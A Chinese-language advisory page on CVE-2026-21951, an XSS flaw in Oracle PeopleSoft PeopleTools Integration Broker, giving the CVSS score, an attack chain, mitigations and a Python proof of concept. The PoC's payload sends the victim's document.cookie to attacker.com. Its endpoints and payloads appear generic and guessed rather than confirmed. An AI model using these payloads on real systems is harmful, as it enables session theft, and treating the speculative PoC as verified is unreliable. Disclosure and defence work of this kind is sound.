CVE-2026-21951 Oracle PeopleSoft PeopleTools Integration Broker 安全漏洞

漏洞信息

漏洞编号

CVE-2026-21951

漏洞类型

跨站脚本(XSS)/未授权数据访问

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Oracle PeopleSoft Enterprise PeopleTools

漏洞概述

CVE-2026-21951是Oracle PeopleSoft Enterprise PeopleTools产品中Integration Broker组件的安全漏洞。该漏洞影响8.60、8.61和8.62版本。攻击者可通过HTTP协议进行网络利用，但需要用户交互才能成功实施攻击。这是一个容易利用的漏洞，允许未经身份验证的攻击者 compromise PeopleSoft Enterprise PeopleTools。成功利用此漏洞可导致对部分PeopleSoft Enterprise PeopleTools可访问数据的未授权更新、插入或删除访问，以及对PeopleSoft Enterprise PeopleTools可访问数据子集的未授权读取访问。由于作用域变更，攻击可能对其他产品产生重大影响。CVSS 3.1基础评分为6.1，主要影响机密性和完整性。

技术细节

该漏洞存在于Oracle PeopleSoft Enterprise PeopleTools的Integration Broker组件中。Integration Broker是PeopleSoft系统中用于处理系统间通信和集成的关键组件。攻击者通过构造恶意的HTTP请求，可以在未授权的情况下访问或修改数据。漏洞利用需要目标用户的交互操作（如点击链接或访问特定页面），这符合存储型XSS或类似注入漏洞的特征。由于该组件负责处理XML消息和集成逻辑，攻击者可能通过注入恶意脚本来绕过输入验证机制。成功利用后，攻击者可以读取敏感数据、修改应用数据或执行其他未授权操作。由于CVSS向量显示作用域变更(S:C)，攻击影响可能扩展到其他系统组件或关联产品。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标PeopleSoft系统版本(8.60/8.61/8.62)，确定Integration Broker组件可访问的端点

STEP 2

步骤2

初始访问：攻击者通过HTTP协议向Integration Broker组件发送恶意构造的请求

STEP 3

步骤3

载荷投递：利用用户交互(如钓鱼邮件、恶意链接)，诱导管理员或用户访问包含恶意脚本的页面

STEP 4

步骤4

漏洞利用：恶意脚本在受害者浏览器中执行，绕过输入验证和输出编码机制

STEP 5

步骤5

数据访问：攻击者获取未授权的数据读取或修改权限，可访问部分PeopleSoft可访问数据

STEP 6

步骤6

权限提升/横向移动：由于作用域变更(S:C)，攻击可能影响其他关联产品，扩大攻击范围

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import re

# CVE-2026-21951 PoC - PeopleSoft Integration Broker Exploitation
# Target: Oracle PeopleSoft Enterprise PeopleTools
# Affected Versions: 8.60, 8.61, 8.62

TARGET_URL = "https://vulnerable-server/psp/ps/".replace("vulnerable-server", "TARGET_HOST")
CVE_ID = "CVE-2026-21951"

def check_vulnerability():
    """Check if target is vulnerable to CVE-2026-21951"""
    
    # Step 1: Identify Integration Broker endpoint
    ib_endpoints = [
        "/psc/ps/EMPLOYEE/HRMS/c/IB_OPR_MGMT.IB_ENDPOINT_LKP.GBL",
        "/psc/ps/EMPLOYEE/HRMS/c/IB_OPR_MGMT.IB_SERVICE_LKP.GBL",
        "/psc/ps/EMPLOYEE/HRMS/c/IB_OPR_MGMT.IB_ROUTING_LKP.GBL"
    ]
    
    # Step 2: Test for XSS in Integration Broker parameters
    xss_payload = "<script>alert('CVE-2026-21951')</script>"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; CVE-2026-21951-scanner)",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    
    for endpoint in ib_endpoints:
        try:
            # Step 3: Send test request with XSS payload
            response = requests.get(
                TARGET_URL + endpoint,
                params={"IB_XSS_TEST": xss_payload},
                headers=headers,
                timeout=30,
                verify=False
            )
            
            # Step 4: Check if payload is reflected without sanitization
            if xss_payload in response.text:
                print(f"[+] Potential vulnerability found at {endpoint}")
                print(f"[+] Payload reflected - XSS may be exploitable")
                return True
                
        except requests.RequestException as e:
            print(f"[-] Error testing {endpoint}: {e}")
            
    return False

def exploit_integration_broker():
    """Attempt exploitation of Integration Broker vulnerability"""
    
    # Malicious payload for data extraction
    exploit_payload = {
        "IB_SERVICE_NAME": "XSS_PAYLOAD_HERE",
        "IB_ROUTING": "<img src=x onerror='fetch(\"https://attacker.com/log?c=\"+document.cookie)'>",
        "OPRID": "test",
        "PASSWORD": "test"
    }
    
    try:
        response = requests.post(
            TARGET_URL + "/psc/ps/EMPLOYEE/HRMS/c/IB_OPR_MGMT.IB_SERVICE_LKP.GBL",
            data=exploit_payload,
            headers=headers,
            timeout=30,
            verify=False
        )
        return response.status_code == 200
    except:
        return False

if __name__ == "__main__":
    print(f"[*] Scanning for {CVE_ID}")
    print(f"[*] Target: {TARGET_URL}")
    
    if check_vulnerability():
        print(f"[!] Target appears vulnerable to {CVE_ID}")
        print(f"[!] Consider testing with authenticated session")
    else:
        print(f"[*] No obvious vulnerability detected")

影响范围

Oracle PeopleSoft Enterprise PeopleTools 8.60

Oracle PeopleSoft Enterprise PeopleTools 8.61

Oracle PeopleSoft Enterprise PeopleTools 8.62

防御指南

临时缓解措施

立即应用Oracle官方安全补丁(Oracle Critical Patch Update - January 2026)。在补丁可用前，可采取以下临时措施：1) 在Web应用防火墙中配置XSS防护规则，拦截恶意脚本；2) 禁用不必要的Integration Broker端点；3) 限制对PeopleSoft管理界面的访问，仅允许授权IP；4) 提醒用户不要点击来自未知来源的链接；5) 启用PeopleSoft的会话管理和CSRF令牌保护；6) 监控Integration Broker的访问日志，检测异常请求模式。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-21951
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-21951
3 Details https://www.cvedetails.com/cve/CVE-2026-21951/
4 VulDB https://vuldb.com/cve/CVE-2026-21951
5 Link https://www.oracle.com/security-alerts/cpujan2026.html